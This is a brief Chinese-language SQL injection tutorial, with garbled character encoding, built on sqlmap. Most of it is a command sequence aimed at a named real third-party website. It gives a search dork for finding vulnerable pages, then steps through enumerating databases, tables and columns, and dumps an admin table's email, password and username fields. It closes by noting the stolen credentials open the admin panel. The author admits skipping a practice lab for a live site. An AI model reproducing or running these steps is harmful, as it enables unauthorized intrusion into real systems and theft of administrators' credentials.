注入類型：字符型、數(shù)字型、搜索型

注入思路:1.檢測是否存在注入? 2.檢測注入類型? 3.構造注入語句?? 4.根據(jù)語句設置閉合點

如果存在過濾機制：根據(jù)判斷出的數(shù)據(jù)庫類型查詢對應運行方式（eg：+? 、||），設計語句表現(xiàn)形式使語句繞過過濾機制在數(shù)據(jù)庫中執(zhí)行時仍然是一條完整的注入語句（eg：空格，ascII碼等），即可達到注入目的

sqlmap實戰(zhàn) ：想用dvwa但是一直有問題，所以直接實站測試，可供測試站點較多 請合法測試?

命令：

0.inurl:.course.php?id=xxx?? 尋找可能的注入點的站點?

1.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16 ?檢測是否存在注入點

2.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16?--dbs? 顯示數(shù)據(jù)庫

3.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16?--current-db? 顯示當前數(shù)據(jù)庫

4.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16?--current-user? 顯示當前用戶

-D 數(shù)據(jù)庫? -T?表? 按照數(shù)據(jù)庫結構逐級查詢

5.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16?-D?當前數(shù)據(jù)庫名? --tables? 查詢有哪些表

6.sqlmap.py?-u?http://www.icd.org.pk/course.php?id=16?-D?當前數(shù)據(jù)庫名-T?要查詢的表--columns?????? 查詢表有哪些字段

7.sqlmap.py?-u?http://www.icd.org.pk/course.phpid=16?-D?efnypvon_icd_db?-T?icd_tbl_admin?"

fEmail,fPassword,fUserName"?--dump?????? dump出fEmail,fPassword,fUserName字段中的數(shù)據(jù)

以上完成sql注入查詢，之后可以使用賬號進入管理界面

sqlmapGUI

參考資源：http://www.vuln.cn/1992